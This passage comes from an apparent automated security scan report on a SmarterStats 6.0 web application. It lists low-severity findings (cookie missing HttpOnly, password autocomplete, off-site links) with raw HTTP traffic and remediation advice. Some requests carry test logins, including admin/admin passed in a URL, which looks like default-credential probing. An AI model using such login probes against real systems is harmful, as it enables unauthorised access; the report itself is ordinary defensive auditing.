<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>
       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>

       <script language="javascript" type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           $(function() { setTimeout(function() { GetFocus(); }, 50); RegisterResizeEvent(); });
       </script>

       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager', 'aspnetForm', ['tctl00$UpdatePanel1',''], [], [], 90, 'ctl00');
//]]>
</script>

       
       <span id="ctl00_UpdatePanel1">
               
           </span>
       
       <div id="Scrollable" class="ContentDiv">
           
   <div class="PopupHelp">
       <div class="PopupHeader">
           What do you need help with?
       </div>
       <br />
       <ul class="SettingsBulletedList">
           <li>
               <a target="_blank" href="http://help.smartertools.com/SmarterStats/v6/default.aspx?p=U&v=6.0.3932&lang=en-US&page=">Help for this page</a></li>
           <li>
               <a target="_blank" href="http://help.smartertools.com/SmarterStats/v6/default.aspx?p=U&v=6.0.3932&lang=en-US">Help Topics</a></li>
           <li>
               <a target="_blank" href="http://help.smartertools.com/SmarterStats/v6/default.aspx?p=U&v=6.0.3932&lang=en-US&page=search">Search Online Help</a></li>
       </ul>
       <br />
   </div>
   <div class="PopupAbout">
       SmarterStats Free Edition 6.0.3932<br />
       Copyright &copy; 2003-2010
       All Rights Reserved.<br />
       <a href="http://www.smartertools.com" id="ctl00_MPH_STLink" target="_blank">http://www.smartertools.com</a>
   </div>

       </div>
       <div id="ctl00_Button" class="PopupButtons">
           <div class="ButtonBarLeft">
               

           </div>
           <div class="ButtonBarRight">
               
   <div id="ctl00_BrPH_CancelButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ClosePopup(); return false;"><span class="BBInner">Close</span></a></div>

           </div>
           <div class="ButtonBarClear">
               <div class="ie6fix">
                   &nbsp;</div>
           </div>
       </div>
       
   <span id="ctl00_Scripts_InjectScript"></span>

   

<script type="text/javascript">
//<![CDATA[
document.ResizeEvent();//]]>
</script>
</form>
</body>
</html>


5.6. http://vulnerable.smarterstats.6.0.host:9999/UserControls/Popups/frmHelp.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /UserControls/Popups/frmHelp.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /UserControls/Popups/frmHelp.aspx?url= HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/default.aspx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Mon, 11 Oct 2010 21:28:46 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 5653
Connection: Close



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head id="ctl00_head1"><title>
   SmarterStats Help
</title><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Popup/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="innerpopup" dir="ltr">
   <form name="aspnetForm" method="post" action="frmHelp.aspx?url=" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJLTU4MjI4MjE1DxYEHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UWAmYPZBYCAgEPZBYGAgUPFgIeB1Zpc2libGVoZAIHD2QWAmYPZBYCAgEPFgIfAmgWAgIBDxYCHgRUZXh0ZWQCCw9kFggCAw8WAh8DBYsBPGEgdGFyZ2V0PSJfYmxhbmsiIGhyZWY9Imh0dHA6Ly9oZWxwLnNtYXJ0ZXJ0b29scy5jb20vU21hcnRlclN0YXRzL3Y2L2RlZmF1bHQuYXNweD9wPVNBJnY9Ni4wLjM5MzImbGFuZz1lbi1VUyZwYWdlPSI+SGVscCBmb3IgdGhpcyBwYWdlPC9hPmQCBQ8WAh8DBX48YSB0YXJnZXQ9Il9ibGFuayIgaHJlZj0iaHR0cDovL2hlbHAuc21hcnRlcnRvb2xzLmNvbS9TbWFydGVyU3RhdHMvdjYvZGVmYXVsdC5hc3B4P3A9U0Emdj02LjAuMzkzMiZsYW5nPWVuLVVTIj5IZWxwIFRvcGljczwvYT5kAgcPFgIfAwWRATxhIHRhcmdldD0iX2JsYW5rIiBocmVmPSJodHRwOi8vaGVscC5zbWFydGVydG9vbHMuY29tL1NtYXJ0ZXJTdGF0cy92Ni9kZWZhdWx0LmFzcHg/cD1TQSZ2PTYuMC4zOTMyJmxhbmc9ZW4tVVMmcGFnZT1zZWFyY2giPlNlYXJjaCBPbmxpbmUgSGVscDwvYT5kAgkPFgIfAwUiU21hcnRlclN0YXRzIEZyZWUgRWRpdGlvbiA2LjAuMzkzMmRklPm2bcjspOuIs7dU8R2pu9PzQOl2Ims0djCxv/EAUX4=" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>
       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>

       <script language="javascript" type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           $(function() { setTimeout(function() { GetFocus(); }, 50); RegisterResizeEvent(); });
       </script>

       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager', 'aspnetForm', ['tctl00$UpdatePanel1',''], [], [], 90, 'ctl00');
//]]>
</script>

       
       <span id="ctl00_UpdatePanel1">
               
           </span>
       
       <div id="Scrollable" class="ContentDiv">
           
   <div class="PopupHelp">
       <div class="PopupHeader">
           What do you need help with?
       </div>
       <br />
       <ul class="SettingsBulletedList">
           <li>
               <a target="_blank" href="http://help.smartertools.com/SmarterStats/v6/default.aspx?p=SA&v=6.0.3932&lang=en-US&page=">Help for this page</a></li>
           <li>
               <a target="_blank" href="http://help.smartertools.com/SmarterStats/v6/default.aspx?p=SA&v=6.0.3932&lang=en-US">Help Topics</a></li>
           <li>
               <a target="_blank" href="http://help.smartertools.com/SmarterStats/v6/default.aspx?p=SA&v=6.0.3932&lang=en-US&page=search">Search Online Help</a></li>
       </ul>
       <br />
   </div>
   <div class="PopupAbout">
       SmarterStats Free Edition 6.0.3932<br />
       Copyright &copy; 2003-2010
       All Rights Reserved.<br />
       <a href="http://www.smartertools.com" id="ctl00_MPH_STLink" target="_blank">http://www.smartertools.com</a>
   </div>

       </div>
       <div id="ctl00_Button" class="PopupButtons">
           <div class="ButtonBarLeft">
               

           </div>
           <div class="ButtonBarRight">
               
   <div id="ctl00_BrPH_CancelButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ClosePopup(); return false;"><span class="BBInner">Close</span></a></div>

           </div>
           <div class="ButtonBarClear">
               <div class="ie6fix">
                   &nbsp;</div>
           </div>
       </div>
       
   <span id="ctl00_Scripts_InjectScript"></span>

   

<script type="text/javascript">
//<![CDATA[
document.ResizeEvent();//]]>
</script>
</form>
</body>
</html>


6. Cookie without HttpOnly flag set  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /login.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

Request

POST /login.aspx HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/login.aspx
Origin: http://vulnerable.smarterstats.6.0.host:9999
X-Requested-With: XMLHttpRequest
X-MicrosoftAjax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cache-Control: no-cache
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"1193026117","TopBarSection":"UserSettings"}
Content-Length: 951

ctl00%24ScriptManager1=ctl00%24UpdatePanel1%7Cctl00%24BPH%24LoginImageButton&__LASTFOCUS=&__EVENTTARGET=ctl00%24BPH%24LoginImageButton&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJMjU1NDEwNjEyDxYEHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UWAmYPZBYCAgEPZBYCAgUPZBYCZg9kFgYCAw9kFgICAQ8WAh4EVGV4dGVkAgUPZBYCAg0PEA8WAh8CBQtSZW1lbWJlciBtZWRkZGQCBw9kFgYCAQ8QZBAVAhRVc2UgQnJvd3NlciBMYW5ndWFnZQdFbmdsaXNoFQIAAmVuFCsDAmdnFgFmZAIDDw8WAh4LTmF2aWdhdGVVUkwFY2h0dHA6Ly9oZWxwLnNtYXJ0ZXJ0b29scy5jb20vU21hcnRlclN0YXRzL3Y2L2RlZmF1bHQuYXNweD9wPVUmdj02LjAuMzkzMiZsYW5nPWVuLVVTJnBhZ2U9TG9naW5BZG1pbmRkAgcPDxYCHghJbWFnZVVybAUGL3MuZ2lmZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFFmN0bDAwJE1QSCRjaGtBdXRvTG9naW4FF2N0bDAwJEJQSCRidG5FbnRlckNsaWNr6qvEQ8B%2F6RhNW2k59YbDX%2F7c%2BpglBMKB69UMRHLnBLI%3D&ctl00%24MPH%24txtSiteId=1&ctl00%24MPH%24txtUserName=weirdo&ctl00%24MPH%24txtPassword=LL12345&ctl00%24MPH%24chkAutoLogin=on&ctl00%24BPH%24LanguageList=&__ASYNCPOST=true&

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 00:55:32 GMT
X-AspNet-Version: 4.0.30319
Set-Cookie: SelectedLanguage=; expires=Mon, 12-Oct-2020 00:55:32 GMT; path=/
Set-Cookie: loginsettings=rhBSoSZ3uKmx8z+qIBCGVhb6e6qOMott; expires=Mon, 12-Oct-2020 00:55:32 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/plain; charset=utf-8
Content-Length: 40
Connection: Close

1|#||4|15|pageRedirect||%2fdefault.aspx|

7. Password field with autocomplete enabled  previous  next
There are 2 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


7.1. http://vulnerable.smarterstats.6.0.host:9999/Login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Login.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /Login.aspx?shortcutLink=autologin&txtSiteID=admin&txtUser=admin&txtPass=admin HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:28:41 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Set-Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; path=/; HttpOnly
Set-Cookie: SelectedLanguage=; expires=Sat, 10-Oct-2020 03:28:41 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 8885



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   SmarterStats Login - SmarterStats
</title>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


   <script type="text/javascript">
       if (parent.isRoot != null)
           parent.location.href = location.href;
       if (parent.parent.isRoot != null)
           parent.parent.location.href = location.href;
   </script>

<link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Login/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="Login" dir="ltr">
   <form name="aspnetForm" method="post" action="Login.aspx?shortcutLink=autologin&amp;txtSiteID=admin&amp;txtUser=admin&amp;txtPass=admin" id="aspnetForm">
<div>
<input type="hidden" name="__LASTFOCUS" id="__LASTFOCUS" value="" />
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJMjU1NDEwNjEyDxYEHhBfX19SZXN1bHRGYWlsdXJlBStTaXRlIElELCB1c2VybmFtZSBvciBwYXNzd29yZCBpcyBpbmNvcnJlY3QuHhBfX19SZXN1bHRTdWNjZXNzZRYCZg9kFgICAQ9kFgICBQ9kFgJmD2QWBgIDD2QWAgIBDxYCHgRUZXh0BU08ZGl2IGNsYXNzPSJUaXBUZXh0RmFpbHVyZSI+U2l0ZSBJRCwgdXNlcm5hbWUgb3IgcGFzc3dvcmQgaXMgaW5jb3JyZWN0LjwvZGl2PmQCBQ9kFgICDQ8QDxYCHwIFC1JlbWVtYmVyIG1lZGRkZAIHD2QWBgIBDxBkEBUCFFVzZSBCcm93c2VyIExhbmd1YWdlB0VuZ2xpc2gVAgACZW4UKwMCZ2cWAWZkAgMPDxYCHgtOYXZpZ2F0ZVVSTAVjaHR0cDovL2hlbHAuc21hcnRlcnRvb2xzLmNvbS9TbWFydGVyU3RhdHMvdjYvZGVmYXVsdC5hc3B4P3A9VSZ2PTYuMC4zOTMyJmxhbmc9ZW4tVVMmcGFnZT1Mb2dpbkFkbWluZGQCBw8PFgIeCEltYWdlVXJsBQYvcy5naWZkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUWY3RsMDAkTVBIJGNoa0F1dG9Mb2dpbgUXY3RsMDAkQlBIJGJ0bkVudGVyQ2xpY2t6/zu2kQq0AGA1NGEQuLPtp+INf25i9ldPE2hT29rBcw==" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>

<script language="javascript">window.onload = function() { if (document.getElementById('ctl00$MPH$txtSiteId') != null) document.getElementById('ctl00$MPH$txtSiteId').focus(); } </script>
<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>
<script src="/WebResource.axd?d=tmbPiP2D38VVojyjJVsEkXwe8X4rw_c60mStWfistR8pyJPOf4ElR79y8d6v9XE45y9Xuon7XBs01GFx3aJPBQ4-yv7YCKPFvc37E1RidaE1&amp;t=634219308989960000" type="text/javascript"></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', ['tctl00$UpdatePanel1',''], [], [], 90, 'ctl00');
//]]>
</script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>
       <div id="ctl00_UpdatePanel1">
   
               <div class="CenteredLogin">
                   <div class="ShadowBox">
                       <div class="LoginBox">
                           <div class="LoginTitle">
                               <div class="RoundedPageTitleLeft">
                                   <div class="RoundedPageTitleRight">
                                       <div class="LoginTitleText">
                                           Login to SmarterStats
                                       </div>
                                   </div>
                               </div>
                           </div>
                           <div class="LoginFrame">
                               <div class="RoundedBottom">
                                   <div class="RoundedLeft">
                                       <div class="RoundedRight">
                                           <div class="RoundedBottomLeft">
                                               <div class="RoundedBottomRight">
                                                   <div id="ctl00_TipTextDiv" class="LoginTipTextContainer">
                                                       <div class="TipTextFailure">Site ID, username or password is incorrect.</div>
                                                   </div>
                                                   <div class="LoginSpacer">
                                                   </div>
                                                   <div class="LoginContent">
                                                       
<div class="LoginSetting">
<div class="LoginLabel">
Site ID
</div>
<input name="ctl00$MPH$txtSiteId" type="text" value="admin" id="ctl00_MPH_txtSiteId" tabindex="1" style="width: 310px" />
</div>
<div class="LoginSetting">
<div class="LoginLabel">
Username
</div>
<input name="ctl00$MPH$txtUserName" type="text" value="admin" id="ctl00_MPH_txtUserName" tabindex="2" style="width: 310px" />
</div>
<div class="LoginSetting">
<div class="LoginLabel">
Password<br />
</div>
<input name="ctl00$MPH$txtPassword" type="password" id="ctl00_MPH_txtPassword" tabindex="3" style="width: 310px" />
</div>
<div class="LoginSetting">
<span class="LoginRememberMe">
<input id="ctl00_MPH_chkAutoLogin" type="checkbox" name="ctl00$MPH$chkAutoLogin" tabindex="3" /><label for="ctl00_MPH_chkAutoLogin">Remember me</label>
</span>
</div>

                                                   </div>
                                                   <div class="LoginButtons">
                                                       
<select name="ctl00$BPH$LanguageList" onchange="javascript:setTimeout(&#39;__doPostBack(\&#39;ctl00$BPH$LanguageList\&#39;,\&#39;\&#39;)&#39;, 0)" id="ctl00_BPH_LanguageList" tabindex="3">
       <option selected="selected" value="">Use Browser Language</option>
       <option value="en">English</option>

   </select>
<div id="ctl00_BPH_HelpImageButton" class="BBButton"><a class="ButtonBarAnchor" href="http&#x3a;&#x2f;&#x2f;help&#x2e;smartertools&#x2e;com&#x2f;SmarterStats&#x2f;v6&#x2f;default&#x2e;aspx&#x3f;p&#x3d;U&#x26;v&#x3d;6&#x2e;0&#x2e;3932&#x26;lang&#x3d;en&#x2d;US&#x26;page&#x3d;LoginAdmin" target="helpwindow" onclick="window.open('http\x3a\x2f\x2fhelp\x2esmartertools\x2ecom\x2fSmarterStats\x2fv6\x2fdefault\x2easpx\x3fp\x3dU\x26v\x3d6\x2e0\x2e3932\x26lang\x3den\x2dUS\x26page\x3dLoginAdmin','helpwindow',''); return false;" tabindex='6'><span class="BBInner">Help</span></a></div>
<div id="ctl00_BPH_LoginImageButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='5' onclick=" __doPostBack('ctl00$BPH$LoginImageButton',''); return false;"><span class="BBInner">Login</span></a></div>
<input type="image" name="ctl00$BPH$btnEnterClick" id="ctl00_BPH_btnEnterClick" tabindex="-1" src="/s.gif" alt=" " style="height:1px;width:1px;border-width:0px;" />

                                                   </div>
                                               </div>
                                           </div>
                                       </div>
                                   </div>
                               </div>
                           </div>
                       </div>
                   </div>
                   <div class="LoginLinks">
                       <a href='http://www.smartertools.com/smarterstats/web-analytics-seo-software.aspx' target='_blank'>SmarterStats Free 6.0</a> | <a href='http://www.smartertools.com/smarterstats/web-analytics-seo-software.aspx' target='_blank'>Web Log Analytics & SEO Software</a> | &copy; 2010 <a href='http://www.smartertools.com/' target='_blank'>SmarterTools Inc.</a>
                   </div>
               </div>
               

                   <script type="text/javascript">
                       $(document).ready(function() {
                           $('select').each(function() {
                               if ($(this).width() > 180) $(this).width(180);
                           });
                       }); </script>

               
           
</div>
       
   

<script type="text/javascript">
//<![CDATA[
WebForm_AutoFocus('ctl00_MPH_txtSiteId');//]]>
</script>
</form>
</body>
</html>


7.2. http://vulnerable.smarterstats.6.0.host:9999/login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /login.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /login.aspx HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/default.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STHashCookie={"CountsGuid":"1413386179","TopBarSection":"AdminManage"}; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:34:01 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 8537



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   SmarterStats Login - SmarterStats
</title>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


   <script type="text/javascript">
       if (parent.isRoot != null)
           parent.location.href = location.href;
       if (parent.parent.isRoot != null)
           parent.parent.location.href = location.href;
   </script>

<link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Login/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="Login" dir="ltr">
   <form name="aspnetForm" method="post" action="login.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__LASTFOCUS" id="__LASTFOCUS" value="" />
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
